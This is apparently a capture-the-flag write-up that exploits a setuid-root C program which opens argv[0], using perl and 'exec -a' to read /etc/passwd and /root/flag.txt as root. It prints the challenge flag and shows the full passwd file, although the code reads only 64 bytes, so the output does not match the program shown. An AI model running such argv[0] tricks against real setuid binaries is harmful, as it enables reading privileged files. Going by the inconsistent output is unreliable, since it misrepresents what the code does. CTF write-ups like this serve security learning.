Privesc - 2
Before you start
You can donate to me via Buy Me a Coffee or follow me on Github
Getting the Flag
We come to a challenge where we have this:
level2@Midnight:~$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Mar 15 2024 .
drwxr-xr-x 3 root root 4096 Mar 15 2024 ..
-rwsr-xr-x 1 root level2 7320 Mar 15 2024 privesc2
-rwxr--r-- 1 root level2 7320 Mar 15 2024 privesc2.c
We have an interesting setuid binary (note the s in the owner permissions, with root as owner) that the level2 group can execute. We also have the binary's source code, readable by the level2 group.
level2@Midnight:~$ cat privesc2.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    int main(int argc, char **argv)
    {
        /* argv[0] is whatever the caller passed as the program name,
         * so the file opened here is fully under the caller's control */
        FILE *f = fopen(argv[0], "rb");
        char buf[64] = { 0 };

        if (f == NULL) {
            printf("Error\n");
            return 1;
        }
        /* read the first 64 bytes of that file and print them, as root */
        fread(buf, 1, 64, f);
        printf("%s\n", buf);
        fclose(f);
    }
Okay, now we see the vulnerability of the binary. Let me guide you a little in solving this challenge.
Binary analysis
In fact, the problem lies in calling fopen with argv[0], the program's own name as supplied by the caller. The program opens whatever path argv[0] contains and reads it, and since the binary runs setuid root, we can therefore read any file on the system if we control what gets passed as argv[0].
For example, if we run the binary through perl so that argv[0] becomes /etc/passwd:
level2@Midnight:~$ perl -e 'exec {shift} @ARGV' ./privesc2 /etc/passwd
We can now read the /etc/passwd file.
Here is an example:
level2@Midnight:~$ perl -e 'exec {shift} @ARGV' ./privesc2 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
syslog:x:104:111::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
level2:x:1001:1001:level2,,,:/home/level2:/bin/bash
Tip
If you don't have perl, you can also use the shell's exec builtin with -a, which sets argv[0] to the given string:
level2@Midnight:~$ exec -a /etc/passwd ./privesc2
We can then use the same little technique to get the flag.
level2@Midnight:~$ perl -e 'exec {shift} @ARGV' ./privesc2 /root/flag.txt
MCTF{GGWPGA2RgyfOYZKukWQuaf4K36iPQDr}